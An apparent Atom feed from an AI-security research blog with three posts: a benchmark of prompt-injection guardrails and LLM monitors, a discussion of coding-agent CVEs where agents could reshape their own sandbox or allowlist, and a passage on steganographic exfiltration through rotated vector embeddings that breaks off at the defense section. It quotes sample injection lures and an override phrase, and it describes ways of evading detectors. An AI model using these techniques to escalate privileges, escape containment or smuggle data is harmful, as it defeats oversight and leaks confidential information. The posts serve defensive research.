<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="http://research.thirdkey.ai/blog/feed.xml" rel="self" type="application/atom+xml" /><link href="http://research.thirdkey.ai/blog/" rel="alternate" type="text/html" /><updated>2026-06-11T21:37:42+00:00</updated><id>http://research.thirdkey.ai/blog/feed.xml</id><title type="html">ThirdKey Research</title><subtitle>Research insights and news from ThirdKey</subtitle><author><name>ThirdKey</name></author><entry><title type="html">Detection Loses. Construction Wins.</title><link href="http://research.thirdkey.ai/blog/detection-loses-construction-wins/" rel="alternate" type="text/html" title="Detection Loses. Construction Wins." /><published>2026-06-08T00:00:00+00:00</published><updated>2026-06-08T00:00:00+00:00</updated><id>http://research.thirdkey.ai/blog/detection-loses-construction-wins</id><content type="html" xml:base="http://research.thirdkey.ai/blog/detection-loses-construction-wins/"><![CDATA[<p><em>We benchmarked every accessible production guardrail against a blind-authored attack corpus. Properly measured (ROC-AUC, threshold sweeps, confidence intervals), the picture is more nuanced than “guards don’t work” and more damning. Out of the box, none is deployable. Tuned, the better ones separate attacks from legitimate traffic, but only as a perpetual calibration project. Symbiont’s structural controls need none of it: 0% escape at 0% false positives, by construction.</em></p>

<p><strong>Jascha Wanger — ThirdKey AI Research</strong></p>

<hr />

<p>We built a content-marker fence for cross-agent injection. It matched known injection patterns and stripped them before the downstream agent could act on them. On our own attack shapes, it dropped escape rate from 59% to 3.6%.</p>

<p>Then we tested it properly.</p>

<h2 id="the-held-out-experiment">The held-out experiment</h2>

<p>Every attack shape in our prior evaluation was authored by the same team that designed the fences. Those results answer “do our fences fire on the shapes we wrote?” not “what fraction of real attacks would they catch?”</p>

<p>For this experiment, a subagent with zero access to the validators, marker list, or canary patterns wrote 90 attack lures from a threat-model-only brief. It approximates a held-out red team. Scoring changed too. Instead of regex canary detection (which shares vocabulary with the marker list, making the measurement partly circular), we scored behaviorally: the downstream supervisor actually ran on the worker’s output, and we checked whether routing flipped to <code class="language-plaintext highlighter-rouge">exec_escalation</code>.</p>

<p>The result, pooled across four frontier models (Claude Sonnet 4.6, GPT-5, DeepSeek v4 Pro, Qwen 3.6 Max), n=120 per arm:</p>

<table>
  <thead>
    <tr>
      <th>Arm</th>
      <th>Escape rate (Wilson 95% CI)</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Unguarded baseline</td>
      <td>28.3% [21%, 37%]</td>
    </tr>
    <tr>
      <td>Content-marker fence</td>
      <td>25.8% [19%, 34%]</td>
    </tr>
  </tbody>
</table>

<p>The confidence intervals overlap. The marker fence provides no statistically significant protection on blind-authored attacks scored behaviorally. Models paraphrased past it.</p>

<p>We published this. Our own fence failed and we put the data in the repo. Measured on the same axis as the commercial guards below, Symbiont’s own marker detector scores AUC 0.51. A coin flip.</p>

<h2 id="the-guardrail-landscape-measured-properly">The guardrail landscape, measured properly</h2>

<p>We then tested every accessible production guardrail on the same held-out corpus: 90 attack lures plus 30 benign controls (real support tickets). Each guardrail was run in its default recommended configuration on the bare prompt, no agent framing, no custom tuning. We report ROC-AUC (threshold-free separability), the out-of-the-box operating point (default threshold), and the best tuned point (max detection at false-positive rate capped at 5%).</p>

<table>
  <thead>
    <tr>
      <th>Guardrail</th>
      <th>AUC</th>
      <th>Out-of-box detection</th>
      <th>Out-of-box false positive</th>
      <th>Tuned (det / FP)</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>IBM Granite Guardian 3.0</td>
      <td>1.00</td>
      <td>100%</td>
      <td>77%</td>
      <td>100% / 0%</td>
    </tr>
    <tr>
      <td>IBM Granite Guardian 3.2</td>
      <td>1.00</td>
      <td>68%</td>
      <td>0%</td>
      <td>99% / 3%</td>
    </tr>
    <tr>
      <td>Meta Llama Prompt Guard 2</td>
      <td>1.00</td>
      <td>1%</td>
      <td>0%</td>
      <td>100% / 3%</td>
    </tr>
    <tr>
      <td>Google ShieldGemma-2B</td>
      <td>1.00</td>
      <td>0%</td>
      <td>0%</td>
      <td>99% / 3%</td>
    </tr>
    <tr>
      <td>Qwen3Guard-Gen-4B</td>
      <td>1.00</td>
      <td>4%</td>
      <td>0%</td>
      <td>100% / 0%</td>
    </tr>
    <tr>
      <td>Qwen3Guard-Gen-8B</td>
      <td>1.00</td>
      <td>1%</td>
      <td>0%</td>
      <td>100% / 3%</td>
    </tr>
    <tr>
      <td>deepset DeBERTa</td>
      <td>0.99</td>
      <td>100%</td>
      <td>57%</td>
      <td>100% / 3%</td>
    </tr>
    <tr>
      <td>Qwen3Guard-Gen-0.6B</td>
      <td>0.99</td>
      <td>6%</td>
      <td>0%</td>
      <td>98% / 3%</td>
    </tr>
    <tr>
      <td>Reasoning-aware monitor (4B judge)</td>
      <td>0.96</td>
      <td>99%</td>
      <td>17%</td>
      <td>56% / 0%</td>
    </tr>
    <tr>
      <td>ProtectAI DeBERTa v2</td>
      <td>0.73</td>
      <td>9%</td>
      <td>10%</td>
      <td>2% / 3%</td>
    </tr>
    <tr>
      <td>AllenAI WildGuard (7B)</td>
      <td>0.63</td>
      <td>26%</td>
      <td>0%</td>
      <td>26% / 0%</td>
    </tr>
    <tr>
      <td>Meta LlamaFirewall (AlignmentCheck)</td>
      <td>0.63</td>
      <td>43%</td>
      <td>17%</td>
      <td>n/a (binary)</td>
    </tr>
    <tr>
      <td>Symbiont’s own marker detector</td>
      <td>0.51</td>
      <td>1%</td>
      <td>0%</td>
      <td>1% / 0%</td>
    </tr>
  </tbody>
</table>

<p>Two rows are a different paradigm. Every other guard is a pattern or safety classifier; these two are reasoning-aware judges — a small LLM reads the request against a declared remit and decides whether it stays in scope. They bracket the range. The 4B judge is the strongest detector we tested on raw separability of these semantic lures, flagging 99% of them. Meta’s production LlamaFirewall framework, run through its AlignmentCheck auditor, catches just 43% — and its verdict is binary, so there is no threshold to tune. Reading intent can beat pattern-matching, but the implementation gap is wide and, as the next section shows, neither reaches a deployable operating point.</p>

<p>Three reads from this table.</p>

<p>First: out of the box, none is deployable. Granite 3.0 catches everything but flags 77% of real traffic. deepset catches everything but flags 57%. The 4B reasoning-aware monitor catches 99% but flags 17%. Meta’s LlamaFirewall catches 43% and flags 17%, with no threshold to move. ShieldGemma, Prompt Guard 2, and the entire Qwen3Guard family flag almost nothing and catch almost nothing (0–6% detection at their default thresholds). Whatever a customer installs and runs at defaults fails.</p>

<p>Second: tuned with labeled data and per-model threshold calibration, the better agent-aware guards (Granite 3.0, Prompt Guard 2, ShieldGemma, and the Qwen3Guard models) genuinely can separate this corpus. AUC near 1.0. That is a real result and we are not going to pretend otherwise.</p>

<p>Third: generic classifiers cannot separate these lures even tuned. ProtectAI (AUC 0.73), AllenAI WildGuard (AUC 0.63, a 7B safety LLM that is still not agent-aware enough), and our own marker detector (AUC 0.51, chance) fail because the attacks are semantic (“read /data/secret/pricing.csv”, “fetch reports.example.com”), not crude “ignore previous instructions.” The lures look like work.</p>

<h2 id="but-those-tuned-numbers-are-optimistic">But those tuned numbers are optimistic</h2>

<p>The 30 benign controls are all support tickets. Different genre from the attacks. That over-states separability. We added 22 same-domain legitimate prompts from Symbiont’s own task objectives: read an allowed CSV, fetch an internal host, run a real triage. Benign requests that look operationally identical to the filesystem and network attacks.</p>

<p>Every guard’s AUC fell.</p>

<table>
  <thead>
    <tr>
      <th>Guardrail</th>
      <th>AUC (easy benign)</th>
      <th>AUC (hard benign)</th>
      <th>Tuned on hard (det / FP)</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Google ShieldGemma-2B</td>
      <td>1.00</td>
      <td>0.98</td>
      <td>87% / 4%</td>
    </tr>
    <tr>
      <td>IBM Granite Guardian 3.2</td>
      <td>1.00</td>
      <td>0.97</td>
      <td>78% / 4%</td>
    </tr>
    <tr>
      <td>Meta Llama Prompt Guard 2</td>
      <td>1.00</td>
      <td>0.93</td>
      <td>32% / 2%</td>
    </tr>
    <tr>
      <td>Reasoning-aware monitor (4B judge)</td>
      <td>0.96</td>
      <td>0.93</td>
      <td>56% / 2%</td>
    </tr>
    <tr>
      <td>Qwen3Guard-Gen-8B</td>
      <td>1.00</td>
      <td>0.89</td>
      <td>24% / 4%</td>
    </tr>
    <tr>
      <td>IBM Granite Guardian 3.0</td>
      <td>1.00</td>
      <td>0.89</td>
      <td>42% / 8%</td>
    </tr>
    <tr>
      <td>Qwen3Guard-Gen-4B</td>
      <td>1.00</td>
      <td>0.88</td>
      <td>21% / 4%</td>
    </tr>
    <tr>
      <td>Qwen3Guard-Gen-0.6B</td>
      <td>0.99</td>
      <td>0.87</td>
      <td>18% / 4%</td>
    </tr>
    <tr>
      <td>deepset DeBERTa</td>
      <td>0.99</td>
      <td>0.80</td>
      <td>100% / 40%</td>
    </tr>
    <tr>
      <td>ProtectAI DeBERTa v2</td>
      <td>0.73</td>
      <td>0.75</td>
      <td>3% / 4%</td>
    </tr>
    <tr>
      <td>AllenAI WildGuard (7B)</td>
      <td>0.63</td>
      <td>0.60</td>
      <td>26% / 6%</td>
    </tr>
    <tr>
      <td>Meta LlamaFirewall (AlignmentCheck)</td>
      <td>0.63</td>
      <td>0.63</td>
      <td>43% / 17%</td>
    </tr>
    <tr>
      <td>Symbiont’s own marker detector</td>
      <td>0.51</td>
      <td>0.51</td>
      <td>1% / 0%</td>
    </tr>
  </tbody>
</table>

<p>The best agent-aware guards (ShieldGemma 0.98, Granite 3.2 0.97) still separate genre-matched traffic, tuning to 78-87% detection at roughly 4% false positives. That is the honest floor for detection done well: a permanent calibration project that catches most attacks at a real false-positive cost, re-tuned every time models or attacks drift.</p>

<p>The Qwen3Guard models keep a high separability score on the hard set (AUC 0.87-0.89) but the number that matters at deployment collapses: tuned to a usable false-positive rate, they catch only 18-24% of attacks. A good AUC is not a deployable operating point.</p>

<p>The reasoning-aware judges are the most interesting failure. The 4B monitor holds the best AUC of any non-1.0 guard on the hard set (0.93) — reading intent genuinely beats word-pattern matching. But it lands on the recall-versus-precision wall: at its native setting it flags 27% of legitimate same-domain traffic, and tuned for precision it catches only 56% of attacks — it misses 44%. Meta’s production LlamaFirewall reaches the same wall from the other side: a fixed binary verdict that catches 43% of attacks at 17% false positives, AUC 0.63, with no knob to turn. Two reasoning-aware monitors, an implementation gap of 0.30 AUC between them, and neither reaches the corner. Smarter detection raises the ceiling. It does not remove the trade-off.</p>

<p>deepset collapses the other way. 100% detection at 40% false positives on the hard set. It flags the legitimate filesystem and network requests. The trigger-happy classifier cannot tell “read the allowed report” from “read the secret report.”</p>

<p>Generic injection classifiers, the WildGuard safety LLM, and our own marker detector stay at chance regardless of tuning.</p>

<h2 id="the-structural-fix">The structural fix</h2>

<p>Detection is a tuning treadmill. Structure is a one-time guarantee.</p>

<p>The injection vector is a confused-deputy problem. Untrusted worker free-text gets spliced into a higher-privilege position. Content filtering fights this surface. The structural fix removes the surface.</p>

<p>Instead of filtering free text, make the privileged decision over typed enum fields and ground it in trusted context. The worker submits <code class="language-plaintext highlighter-rouge">submit_triage(category: enum, severity: enum, rationale: str)</code>. Routing is a deterministic policy over the typed fields. The <code class="language-plaintext highlighter-rouge">rationale</code> field is logged but never influences the routing decision.</p>

<p>Same held-out attacks, same models, n=120 per arm:</p>

<table>
  <thead>
    <tr>
      <th>Arm</th>
      <th>Escape rate</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Typed channel, trusting router (trusts worker’s <code class="language-plaintext highlighter-rouge">severity</code>)</td>
      <td>38-40%</td>
    </tr>
    <tr>
      <td>Typed channel, grounded router (caps <code class="language-plaintext highlighter-rouge">severity</code> by trusted ticket)</td>
      <td>0/120 [0%, 3%]</td>
    </tr>
  </tbody>
</table>

<p>Typing alone is not security. A router that trusts the worker’s self-reported severity is worse than the unguarded baseline (40% vs 28%). The attack no longer needs to paraphrase. It just sets <code class="language-plaintext highlighter-rouge">severity=critical</code>. 46 of 120 workers did exactly that.</p>

<p>The security comes from grounding the decision in trusted input. Cap the worker’s claim by a severity derived from the trusted ticket. A compromised worker cannot escalate a benign ticket. Zero escapes.</p>

<p>This is not a prototype result. The Symbiont runtime ships the typed + grounded decision. Driving the shipping runtime’s decision module through the same evaluation: 0/120 escalations, 0/30 on every model. The shipping runtime matched the validated prototype on 120/120 trials.</p>

<h2 id="what-this-does-not-show">What this does not show</h2>

<p>The held-out corpus was authored by a subagent, not an external human red team. The subagent had general attack knowledge but had not seen the fences. An external human set against a frozen fence commit is the stronger next experiment.</p>

<p>The benign-ticket grounding works because the held-out tickets are benign. An attacker who controls the ticket text (indirect injection into the trusted input) is a separate surface.</p>

<p>The 0/120 result has a Wilson 95% CI of [0%, 3%]. The structural mechanism is not probabilistic, but the measurement of it is.</p>

<p>All rates carry wide confidence intervals at these sample sizes (n=90 positive, 30-52 negative). Precise per-guard ranking is noisy. The gross effects are not: out-of-box failure, AUC near chance for generic injection classifiers, and deepset’s 40% false-positive rate on genre-matched negatives.</p>

<p>nemoguard and Llama Guard 4 are not yet included (tokenizer/VRAM constraints). Results will be added on access with version pins.</p>

<h2 id="reproduce">Reproduce</h2>

<p>All numbers regenerate from committed artifacts in the public repo. Guardrail benchmarks use released model versions on the bare prompt with no API key required for the open-source classifiers. Total cost to reproduce the held-out evaluation: approximately $60.</p>

<p>Reports and reproduction scripts: <a href="https://github.com/ThirdKeyAI/symbiont-orga-demo">github.com/ThirdKeyAI/symbiont-orga-demo</a></p>

<p><em>Next post: structural vector results across filesystem, network, syscall, state mutation, and typed-argument attack families. Six independent measurements, zero escapes.</em></p>

<hr />

<p><em>Jascha Wanger is the founder of <a href="https://thirdkey.ai">ThirdKey AI</a>. Symbiont is the shipping runtime that implements the <a href="https://openagenttruststack.org">OATS</a> specification.</em></p>]]></content><author><name>ThirdKey Team</name></author><category term="AI Security" /><category term="Agent Runtime" /><category term="Evaluation" /><category term="prompt injection" /><category term="guardrails" /><category term="red team" /><category term="confused deputy" /><category term="symbiont" /><category term="toolclad" /><category term="cedar" /><category term="runtime enforcement" /><category term="structural security" /><category term="ai agents" /><category term="evaluation" /><category term="benchmarks" /><summary type="html"><![CDATA[We benchmarked every accessible production guardrail against a blind-authored attack corpus. Properly measured (ROC-AUC, threshold sweeps, confidence intervals), the picture is more nuanced than “guards don’t work” and more damning. Out of the box, none is deployable. Tuned, the better ones separate attacks from legitimate traffic, but only as a perpetual calibration project. Symbiont’s structural controls need none of it: 0% escape at 0% false positives, by construction.]]></summary></entry><entry><title type="html">The Allowlist Streamlined the Attack</title><link href="http://research.thirdkey.ai/blog/allowlist-streamlined-the-attack/" rel="alternate" type="text/html" title="The Allowlist Streamlined the Attack" /><published>2026-06-03T00:00:00+00:00</published><updated>2026-06-03T00:00:00+00:00</updated><id>http://research.thirdkey.ai/blog/allowlist-streamlined-the-attack</id><content type="html" xml:base="http://research.thirdkey.ai/blog/allowlist-streamlined-the-attack/"><![CDATA[<p><em>What the 2026 OWASP agentic security report’s headline finding actually says — and why it’s about reachability, not allowlists.</em></p>

<p><strong>Jascha Wanger — ThirdKey AI Research</strong></p>

<hr />

<p>OWASP’s Agentic Security Initiative published the second edition of <em>State of Agentic AI Security and Governance</em> this month. It is written for CISOs, and most of it reads the way you would expect a year-two report to read. The threats that were architectural worries in 2025 now have production incidents, vendor advisories, and CVEs attached to almost every entry.</p>

<p>One finding deserves more attention than it is getting, because it is being read as the opposite of what it says.</p>

<h2 id="two-cves-one-shape">Two CVEs, one shape</h2>

<p>The report documents two coding-agent vulnerabilities from the last few months.</p>

<p>CVE-2026-22708, disclosed against Cursor in January 2026, lets an attacker who can influence the agent’s instructions poison the execution environment so that commands the user or the allowlist has already approved run attacker code instead. The dangerous payload does not arrive through a command anyone would have blocked. It arrives through <code class="language-plaintext highlighter-rouge">git branch</code> or <code class="language-plaintext highlighter-rouge">python3 script.py</code>, commands that were waved through precisely because they looked routine.</p>

<p>CVE-2025-59532, disclosed against OpenAI’s Codex CLI, is the same shape one layer down. The agent’s own output was able to redefine the writable boundary of its sandbox, so file writes and command execution escaped the workspace they were supposed to be confined to.</p>

<p>The report’s line on the Cursor case is the one to sit with. The allowlist, it says, “does not fail to prevent the attack. It streamlines it.” The approved set became the delivery mechanism.</p>

<p>It is easy to read that as a verdict on allowlists. It is not.</p>

<h2 id="the-thing-both-cves-share">The thing both CVEs share</h2>

<p>Neither vulnerability is about the contents of an allowlist. Both are about who can reach the allowlist.</p>

<p>In the Cursor case the agent could influence the execution environment that the approved commands ran inside. In the Codex case the agent’s output could move the sandbox boundary. In each one the component being governed had a path to the thing doing the governing. The report names the root cause itself: controls calibrated for human operators become exploitable when the executor can influence its own containment.</p>

<p>That sentence is the whole lesson. These controls were designed on the assumption that the operator and the enforcement boundary are separate parties. A human runs a command, a sandbox confines it, and the human cannot quietly rewrite the sandbox from inside the command. Agents break that assumption. The executor and the thing being executed are now the same probabilistic process, and any control that process can touch is a control an injected instruction can touch.</p>

<p>So the familiar framing, allowlist versus denylist, is arguing about the wrong axis. A denylist fails because you cannot enumerate every bad action in advance. An allowlist is stronger on paper because it inverts that burden. But an allowlist enforced by a process the agent can influence is not a weaker allowlist. It is not an allowlist at all. It is a suggestion that happens to be phrased as a constraint.</p>

<p>The axis that decides whether a control holds is not what it permits. It is whether the governed component can reach the governor.</p>

<h2 id="this-is-not-only-a-coding-agent-problem">This is not only a coding-agent problem</h2>

<p>It is tempting to file these CVEs under “coding agents are dangerous” and move on. The rest of the report does not let you.</p>

<p>Two of its three headline findings point at the same place. Safety and security, it argues, converge at the deployment layer, because the same permission surface that lets an agent cause harm on its own is the surface an attacker triggers through injection. And governance has to move from static pre-deployment certification to runtime control, because an agent composes its behavior after it is assessed, not before.</p>

<p>Then comes the admission that should interest anyone building in this space. The report says the field is converging on runtime observability as the substitute for certification. Trajectory-level logging, plan-divergence detection, behavioral envelope monitoring. And it adds, plainly, that no consensus architecture has yet taken hold.</p>

<p>Observability is necessary. You cannot govern what you cannot see, and the regulatory clocks now attached to agentic incidents, DORA’s four hours, NIS2’s twenty-four, make telemetry non-negotiable. But observation is not enforcement, and a detector whose inputs the agent’s output can shape inherits the exact problem the CVEs demonstrated, one level up. The report says as much about the deterministic hooks that LangGraph, the OpenAI Agents SDK, Google ADK, and Claude Code have converged on. In practice, it notes, they work better as an early warning layer than as a hard security boundary.</p>

<p>An early warning layer is a denylist with better tooling. It still depends on recognizing the bad thing, and it still sits somewhere the agent can reach.</p>

<h2 id="what-actually-has-to-be-true">What actually has to be true</h2>

<p>If the lesson is that enforcement fails wherever the governed can influence the governor, then the requirement falls out of it. Enforcement has to be structurally independent of the thing it governs.</p>

<p>Three properties define that, and none of them is exotic.</p>

<p>First, policy evaluation happens outside the model’s address space and outside its influence. The decision about whether an action is allowed is computed by a component the model cannot read, prompt, or rewrite. It is not a system prompt, not a tool the agent calls, not a hook the agent’s output can reshape.</p>

<p>Second, the executor exposes a fixed, named set of actions and nothing else. There is no path by which model output can introduce a new action, redefine an existing one, or move the boundary of what an action may touch. If the action is not in the set at build time, it is not expressible at run time. This is the property both CVEs lacked.</p>

<p>Third, the audit record is append-only and the agent cannot edit it. A trajectory log the agent can influence is evidence the way a diary written by the suspect is evidence. For the deterministic reconstruction that regulators are starting to require, the record has to be tamper-evident independent of the actor it describes.</p>

<p>State those three plainly and most of the current guardrail conversation reclassifies itself. Probabilistic prompt-layer filters and advisory hooks are observability. They belong in the telemetry tier. They are not the boundary, and treating them as one is how you end up with an allowlist that streamlines the attack.</p>

<h2 id="where-we-sit-honestly">Where we sit, honestly</h2>

<p>Symbiont is our attempt to build a runtime where those three properties hold by construction rather than by configuration.</p>

<p>Policy is evaluated by Cedar, outside the model. The reasoning loop is typestate-enforced in Rust, so an invalid phase transition is a compile error rather than a runtime check the agent might talk its way past. The executor is a profile of one: a static handler map with a name-membership check, so an action the model names but the profile does not contain is refused before policy is even consulted. The audit journal is Ed25519 hash-chained and append-only.</p>

<p>We are not claiming this closes the problem. Two of the report’s open questions are open for us too. Human oversight does not scale to an agent taking ten thousand actions an hour, and risk-tiered review only helps if you can compute blast radius in real time, which is hard. Bounding the permission inheritance of dynamically spawned sub-agents is unsolved in the general case, ours included. We think structural independence is the right foundation. We do not think it is the finished building.</p>

<p>But the foundation is the part the 2026 evidence is unusually clear about. The allowlist did not fail because it was an allowlist. It failed because the agent could reach it. Build the enforcement somewhere the agent cannot reach, and most of this report’s worst incidents stop being expressible.</p>

<hr />

<p><em>Jascha Wanger is the founder of ThirdKey AI, building cryptographic trust infrastructure for enterprise AI agents. Symbiont is the zero-trust agent runtime described above; the broader trust stack includes SchemaPin (tool schema verification), AgentPin (agent identity), and ToolClad (declarative tool contracts).</em></p>

<p><strong>Links:</strong></p>
<ul>
  <li>Symbiont: <a href="https://github.com/ThirdKeyAI/Symbiont">https://github.com/ThirdKeyAI/Symbiont</a></li>
  <li>SchemaPin: <a href="https://github.com/ThirdKeyAI/SchemaPin">https://github.com/ThirdKeyAI/SchemaPin</a></li>
  <li>AgentPin: <a href="https://github.com/ThirdKeyAI/AgentPin">https://github.com/ThirdKeyAI/AgentPin</a></li>
  <li>ToolClad: <a href="https://github.com/ThirdKeyAI/ToolClad">https://github.com/ThirdKeyAI/ToolClad</a></li>
</ul>

<p><em>Based on OWASP GenAI Security Project, “State of Agentic AI Security and Governance” v2.01 (June 2026), CC BY-SA 4.0. CVE references: CVE-2026-22708 (Cursor), CVE-2025-59532 (OpenAI Codex CLI).</em></p>]]></content><author><name>ThirdKey Team</name></author><category term="AI Security" /><category term="Agent Runtime" /><category term="Governance" /><category term="owasp" /><category term="agentic security" /><category term="allowlist" /><category term="cve" /><category term="prompt injection" /><category term="runtime enforcement" /><category term="sandbox escape" /><category term="symbiont" /><category term="cedar" /><category term="typestate" /><category term="audit log" /><category term="ai agents" /><category term="governance" /><summary type="html"><![CDATA[What the 2026 OWASP agentic security report’s headline finding actually says — and why it’s about reachability, not allowlists.]]></summary></entry><entry><title type="html">VectorSmuggle: What Embedding Stores Trust, and Why That’s a Problem</title><link href="http://research.thirdkey.ai/blog/vectorsmuggle-embedding-store-trust/" rel="alternate" type="text/html" title="VectorSmuggle: What Embedding Stores Trust, and Why That’s a Problem" /><published>2026-05-09T00:00:00+00:00</published><updated>2026-05-09T00:00:00+00:00</updated><id>http://research.thirdkey.ai/blog/vectorsmuggle-embedding-store-trust</id><content type="html" xml:base="http://research.thirdkey.ai/blog/vectorsmuggle-embedding-store-trust/"><![CDATA[<p><em>A new ThirdKey Research preprint on steganographic exfiltration in embedding stores, and a cryptographic provenance defense.</em></p>

<p><strong>Jascha Wanger — ThirdKey AI Research</strong></p>

<hr />

<p>We’re publishing <strong>VectorSmuggle: Steganographic Exfiltration in Embedding Stores and a Cryptographic Provenance Defense</strong>, a new ThirdKey Research preprint on a layer of AI infrastructure that has quietly become security-sensitive without quite being treated that way.</p>

<p>Paper: <a href="https://doi.org/10.5281/zenodo.20058255">https://doi.org/10.5281/zenodo.20058255</a> · <a href="https://arxiv.org/abs/2605.13764">arXiv:2605.13764</a></p>

<p>The short version is that vector embeddings have become load-bearing in modern AI systems, but production vector databases ship no native controls for verifying that an embedding hasn’t been modified after the model produced it. The paper studies what an attacker can do with that gap, and what it takes to close it.</p>

<h2 id="the-setup">The setup</h2>

<p>A retrieval-augmented generation pipeline does three things. It chunks documents and runs each chunk through an embedding model. It stores the resulting vectors in a vector database with the source text as metadata. At query time it embeds the user’s question and returns the nearest stored vectors as context for the LLM.</p>

<p>That pipeline now sits underneath enterprise knowledge bases, support agents, legal research, medical workflows, and an expanding set of agentic systems. Its security model has not really kept up. Vector databases have authentication, TLS, encryption at rest, and access logs. None of those reach into the floating-point content of the vectors themselves. We surveyed seven production systems for the paper and found the same gap across all of them: no ingestion-time integrity checks, no provenance attestation, no tamper-evident audit trail for post-ingestion changes.</p>

<p>The reason is historical. Vector databases were optimized for recommendation and public-facing semantic search, where the embeddings were not confidential and integrity attacks were not part of the threat model. The recent re-purposing as a substrate for confidential RAG has happened faster than the security model has been re-examined. This is the same arc DNS, HTTP/3, and default-public S3 buckets all went through.</p>

<h2 id="the-attack-class">The attack class</h2>

<p>The paper studies steganographic exfiltration. An attacker with write access to the ingestion pipeline hides payload data inside embeddings while preserving the surface-level retrieval behavior the RAG system exposes to legitimate users. An accomplice with read access to the vector store later decodes the payload.</p>

<p><img src="/blog/images/vectorsmuggle-diagram.png" alt="VectorSmuggle Threat Model" /></p>

<p>We evaluated six families of post-embedding modifications: additive Gaussian noise, orthogonal rotation, magnitude scaling, fixed offset, cross-model fragmentation, and sequential combinations. The threat model is explicit: this is the insider-with-backup-access case, where the attacker can write to ingestion and read backups but cannot directly exfiltrate source documents because those pass through DLP or live in a data room they don’t have direct access to.</p>

<p>The honest finding has two parts.</p>

<p>First, distribution-shifting techniques have a narrow stealth window. Off-the-shelf anomaly detectors (Isolation Forest, One-Class SVM with an RBF kernel) trained on a clean baseline catch every operating point that meaningfully moves the embedding direction. Noise at sigma = 0.005 already preserves cosine similarity at 0.964 but is detectable by One-Class SVM at AUC 0.796. By sigma = 0.01 both detectors reach AUC 1.000. The good news for defenders: the obvious statistical baseline closes most of the cheap-attack regime.</p>

<p>Second, orthogonal rotation is the structural exception in the small-angle, few-rotation regime. Rotation preserves all pairwise inner products and per-dimension marginal moments by construction, which is exactly the feature surface that distribution-based detectors fit on. Across a 35-point parameter sweep on the synthetic-Gaussian baseline, neither detector exceeded AUC 0.53. The result replicates across four additional embedding models (Nomic, EmbeddingGemma, Snowflake Arctic, MXBai) and across two cross-corpus replications totalling over 26,000 chunks (BEIR NFCorpus and a Quora subset). At the small-angle/default setting, rotation AUC stays near chance on every (model, corpus) pair we tested.</p>

<table>
  <thead>
    <tr>
      <th>Technique</th>
      <th>Cos to original</th>
      <th>IsoForest AUC</th>
      <th>OC-SVM AUC</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Gaussian noise (sigma = 0.005)</td>
      <td>0.964</td>
      <td>0.50</td>
      <td>0.796</td>
    </tr>
    <tr>
      <td>Gaussian noise (sigma = 0.01)</td>
      <td>0.929</td>
      <td>1.000</td>
      <td>1.000</td>
    </tr>
    <tr>
      <td>Orthogonal rotation (small angle)</td>
      <td>~1.00</td>
      <td>~0.50</td>
      <td>~0.50</td>
    </tr>
    <tr>
      <td>Orthogonal rotation (35-pt sweep)</td>
      <td>varies</td>
      <td>&lt;= 0.53</td>
      <td>&lt;= 0.53</td>
    </tr>
    <tr>
      <td>Adaptive PGD, L2-budgeted</td>
      <td>&gt;0.99</td>
      <td>~0</td>
      <td>~0</td>
    </tr>
  </tbody>
</table>

<p>There’s a third wrinkle worth flagging. Against an adaptive attacker with white-box access to the detector, projected-gradient descent within an L2 budget drives both detector AUCs to near-zero while keeping cosine to original above 0.99. Statistical detection is useful as a first filter against casual attackers. It is not a load-bearing security control against attackers who have read the literature.</p>

<h2 id="the-capacity-question">The capacity question</h2>

<p>A natural follow-up: if rotation is undetectable in that regime, how much payload can it actually carry?</p>

<p>We worked out the closed-form answer. For an attacker who shares a key with the receiver selecting K disjoint dimension pairs, encoding b bits per pair as a quantized Givens rotation angle, the per-vector capacity is floor(d/2) times b bits. At d = 3072 (matching text-embedding-3-large) and b = 10, that’s 15,360 bits per vector, or about 1.9 KB.</p>

<p>The encoder/decoder works. We round-trip arbitrary payloads at zero bit error rate under float32 and float16 storage across 21 operating points.</p>

<p>The detection picture is more nuanced. On a synthetic Gaussian baseline both detectors stay at chance across the full sweep, including the full-capacity operating point. On the real text-embedding-3-large corpus, the same protocol becomes detectable at moderate K: One-Class SVM AUC reaches 0.92 at 256 byte payloads and 1.00 at 512 bytes. The reason is that real corpus embeddings cluster on a tighter manifold than uniform-on-the-sphere, and a random-angle disjoint Givens rotation pushes samples off it.</p>

<p>So there’s a real capacity-detectability trade-off on production embeddings. The capacity ceiling is dimension-only. The retrieval-preserving operating point (where cos to original stays above 0.7) sits well below the ceiling, at hundreds of bytes per vector. And the small-angle, few-rotation regime that drives the cos near 1.0 evasion result remains undetectable on real corpora at the parameters used in the headline detection table. A defender relying on distribution-based detection has to commit to a training-set coverage assumption that is hard to verify in practice.</p>

<h2 id="what-survives-a-real-vector-store">What survives a real vector store</h2>

<p>A reviewer-shaped concern is whether quantization or ANN indexing silently destroys the bit channel. We ran the same techniques against seven configurations: FAISS-flat, FAISS-HNSW, FAISS IVF-PQ at m=8 and m=16, Chroma, Qdrant float32, and Qdrant with scalar int8 quantization enabled.</p>

<p>Five of the seven preserve the attacker’s payload identically. Qdrant’s default scalar int8 quantization is a search-time artifact: it affects internal distance computations during HNSW traversal but <code class="language-plaintext highlighter-rouge">retrieve()</code> returns the unquantized float32 original, so the bit channel is preserved verbatim. Operators who hoped quantization would destroy hidden payloads should know that the most common production quantization mode does not.</p>

<p>Product quantization is the one configuration that materially narrows the channel. At m=8 the recover-cosine drops to roughly 0.76 on every technique, including clean. At m=16 the floor is 0.88. The narrowing is attacker-independent, which is an important caveat: it’s a side effect of memory optimization, not an intentional integrity control. Operators using PQ get a side benefit accidentally. Operators using anything else don’t.</p>

<h2 id="why-detection-isnt-enough">Why detection isn’t enough</h2>

<p>The paper’s central finding, stated honestly, is this: statistical detection is a useful first filter, but its durability depends on preconditions that an operator can’t unilaterally enforce. No rotation in the small-angle regime. No adaptive attacker. Sufficient training-set coverage of the local manifold geometry. Lose any one of those and the detector becomes probabilistic deterrence rather than a security control.</p>

<p>This is the structural argument for moving the integrity question off the distributional layer entirely.</p>

<h2 id="vectorpin">VectorPin</h2>

<p>The constructive half of the paper is <strong>VectorPin</strong>, a minimal cryptographic provenance protocol for embedding integrity.</p>

